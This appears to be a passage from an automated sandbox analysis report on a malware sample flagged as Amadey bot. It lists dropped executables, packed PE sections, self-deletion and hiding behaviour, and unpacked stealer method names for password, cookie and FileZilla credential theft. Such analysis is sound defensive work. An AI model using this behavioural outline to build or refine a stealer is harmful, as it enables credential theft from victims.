Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_00402E94 push es; iretd
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 8_2_004E3634 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE1039 push B70F6E7Bh; iretd
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEA2AE push 0000006Ah; retf
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEA2AC push 0000006Ah; retf
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEA244 push 0000006Ah; retf
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DDF76E push esi; ret
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE1ED4 push edi; retn 000Ch
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00EA3303 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00EC616A push esi; iretd
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_00E841AC push eax; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_0583E89F push 5D5F5E5Bh; retn 0008h
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_0583740B push F400005Eh; iretd
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_00401880 push esi; iretd
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_00402E94 push es; iretd
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_00402E94 push es; iretd
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 14_2_004141AC push eax; retf 0005h
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_004146F5 push ecx; ret

Source: C:\Users\user\Desktop\v72n86vFFq.exe

Code function: 0_2_0042D8E0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: 12F1.exe.6.dr

Static PE information: 0xD8CC78B8 [Thu Apr 5 03:15:04 2085 UTC]

Source: 12F1.exe.6.dr	Static PE information: section name:
Source: 12F1.exe.6.dr	Static PE information: section name:
Source: 12F1.exe.6.dr	Static PE information: section name:
Source: 361B.exe.6.dr	Static PE information: section name: .fefeg
Source: 361B.exe.6.dr	Static PE information: section name: .guyus
Source: 361B.exe.6.dr	Static PE information: section name: .venu
Source: 305.exe.6.dr	Static PE information: section name:
Source: 305.exe.6.dr	Static PE information: section name:
Source: 305.exe.6.dr	Static PE information: section name:
Source: 305.exe.6.dr	Static PE information: section name:
Source: 305.exe.6.dr	Static PE information: section name:
Source: 305.exe.6.dr	Static PE information: section name: .themida
Source: 305.exe.6.dr	Static PE information: section name: .boot

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: initial sample	Static PE information: section name: .text entropy: 6.93440652301
Source: initial sample	Static PE information: section name: entropy: 7.99958739292
Source: initial sample	Static PE information: section name: .text entropy: 7.47748148421
Source: initial sample	Static PE information: section name: .text entropy: 7.03337183063
Source: initial sample	Static PE information: section name: .text entropy: 6.93384153708
Source: initial sample	Static PE information: section name: entropy: 7.97546579113
Source: initial sample	Static PE information: section name: .text entropy: 7.25113586904
Source: initial sample	Static PE information: section name: .text entropy: 6.93440652301

Source: 9.2.12F1.exe.ce0000.0.unpack, EntityCreator.cs	High entropy of concatenated method names: 'S??n', 'ScanPasswords', 'ScanCook', 'ScanFills', 'GetEntityCards', 'ReadRawData', 'ReadKey', 'MakeTries', 'EQQhVK0sySfSn9K9JZ', 'N71KZf1SWv1K2GDC5d'
Source: 9.2.12F1.exe.ce0000.0.unpack, FileZilla.cs	High entropy of concatenated method names: 'Scan', 'ScanCredentials', 'GetRecent', '.ctor', 'p35QMACOYsl47ibQuI', 'ePtFWMQSIhC0rn8m8W', 'R9DrRkkvQMHKMD0yqu', 'LEItYPRrklTjOdjHn8', 'VCoQdvm5lquKbRtw9c', 'XCunvihoIDluNWhDmU'
Source: 9.2.12F1.exe.ce0000.0.unpack, NVP6cvsRm8LVKY2UGDp/dh5sYbsOQPvuwVEurZ3.cs	High entropy of concatenated method names: 'vVgkCk9peD', 'eBxqprrF8', 'LYQkSK2xW1', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'q4216ROghthnQHI5Mi', 'emXmspdyyJcJGsF0mk', 'q3PyHOVXHKKBqYCLdI', 'P8len2HbpjXgcuKmsm'
Source: 9.2.12F1.exe.ce0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.cs	High entropy of concatenated method names: '.cctor', 'gXrXJmbBk0fMg', 'VHnWmDmvPp', 'THRWAqJ2n8', 'SaxWJ28jWa', 'dvfWrrM8Ye', 'FPBWpsy6DI', 'lXgWI9Kghy', 'HsGWZme8nA', 'h0oWKi8BXG'
Source: 9.2.12F1.exe.ce0000.0.unpack, SystemInfoHelper.cs	High entropy of concatenated method names: 'CreateBind', 'GetProcessors', 'GetGraphicCards', 'GetBrowsers', 'GetSerialNumber', 'ListOfProcesses', 'GetVs', 'GetProcessesByName', 'ListOfPrograms', 'AvailableLanguages'
Source: 9.2.12F1.exe.ce0000.0.unpack, DesktopMessanger.cs	High entropy of concatenated method names: 'get_PassedPaths', 'set_PassedPaths', 'GetFolder', 'GetScanArgs', '.ctor', 'JDRJATJH8OsfAdRcXoU', 'GT8CtBJ6RU61J5dVXcR', 'nLbmJNJjb1O8aXmL2iJ', 'WObcxCJzgvpQlsvWcV8', 'PZKMpfgY3nXaWHFSaNL'
Source: 9.2.12F1.exe.ce0000.0.unpack, DownloadAndExecuteUpdate.cs	High entropy of concatenated method names: 'IsValidAction', 'Process', '.ctor', 'suCGZrgDquXtlnEU7PW', 'h1iJkRg4mk3lrbYRppI', 'xM4TErgyseDCOHyUlkR', 'tKb9k7gVpw5Vd8bDCaH', 'Xox03xgAXbFK73KqDBQ', 'N1C9TGgZGLfpmyueXSL', 'YISawpgBuhj5vmBy2dI'
Source: 9.2.12F1.exe.ce0000.0.unpack, CryptoHelper.cs	High entropy of concatenated method names: 'DecryptBlob', 'DecryptBlob', 'GetMd5Hash', 'GetHexString', 'oxpwRrHA7MtDBxSIru', 'Wt4xfA6vQLqOEQQNkl', 'HElv60jaJ8nsEr1lEN', 'hCQBb79rvYiWNO2DMT', 'KCJr4olaAr9jk2boMp', 'IhuDrrzFi7G6oWiNAf'
Source: 9.2.12F1.exe.ce0000.0.unpack, StringDecrypt.cs	High entropy of concatenated method names: 'Xor', 'FromBase64', 'BytesToStringConverted', 'Read', 'ghoRf92gfNog3T9p6kA', 'wUohRm2d2P26SHynAUm', 'uQeqla2o5hVxcSOrh8L', 'uPlOXQ22GGRNrpnOJjq', 'ceqq1M2JNoJRnyYmRPs', 'TnY1Ph2KJe7YqLpSP96'
Source: 9.2.12F1.exe.ce0000.0.unpack, FullInfoSender.cs	High entropy of concatenated method names: '.ctor', 'Send', 'sdfk8h34', 'Visible', 'asdk9y3', 'kadsoji83', 'kkdhfakdasd', 'sdfm83kjasd', 'sdfkas83', 'gkdsi8y234'
Source: 9.2.12F1.exe.ce0000.0.unpack, IPv4Helper.cs	High entropy of concatenated method names: 'IsLocalIp', 'GetDefaultIPv4Address', 'Request', 'l6wgX0dmeglkHJ0WPMy', 'Y98T2IdhCOMvBEtyswu', 'u07E63dkK7KQsv6UfkC', 'NUDS7adRiWPUSIrpwkA', 'dNXam6dTeWI9CfTKAHX', 'k0N7SJdvqtsUlBhKKt7', 'OcvvkVdEOFt3WV8LRWT'
Source: 9.2.12F1.exe.ce0000.0.unpack, GdiHelper.cs	High entropy of concatenated method names: 'GetCaps', 'GetWindowsScreenScalingFactor', 'MonitorSize', 'GetImageBase', 'ConvertToBytes', 'pI7r7Md3soxSL9mb8KT', 'r4XL9hdtk8GlgbO4lV1', 'AdGD67dNXHCPifdiUjC', 'gtxaWkdao542VDfu7cK', 'hg7b6fdO0cE9xI9o5eN'
Source: 9.2.12F1.exe.ce0000.0.unpack, Extensions.cs	High entropy of concatenated method names: 'ReadFile', 'ReadFileAsText', 'ChangeType', 'StripQuotes', 'DomainExists', 'PreCheck', 'sr4nxed2gajXEy6V6v3', 'IgFQ4fdJwdwfGXnXjK1', 'qifPHadg3fjdncPffFK', 'ltFUj4gz3op6nbcJlbG'
Source: 9.2.12F1.exe.ce0000.0.unpack, TaskResolver.cs	High entropy of concatenated method names: '.ctor', 'get_Result', 'ReleaseUpdates', 'V0m281g9YIM4NbYDSha', 'AsE6jcglQi2iDoG9Uqi', 'kwUSnbgHZLVsMd2PiwR', 'GUJ8n3g6xBc6RbaApvU', 'WinHfOgM2rluFJ2EYT0', 'ipVybUgwKLmQrLxQ9qN'

Persistence and Installation Behavior:

Yara detected Amadey bot

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\44A2.exe

File created: C:\ProgramData\sqlite3.dll

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\hiftsuu

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\305.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\44A2.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2340.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\51B3.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\12F1.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hiftsuu	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1EAA.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\361B.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2340.exe	File created: C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\v72n86vffq.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\hiftsuu:Zone.Identifier read attributes | delete

Source: C:\Users\user\AppData\Local\Temp\44A2.exe

Code function: 17_2_0040C0B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\AppData\Local\Temp\12F1.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Process information set: NOOPENFILEERRORBOX
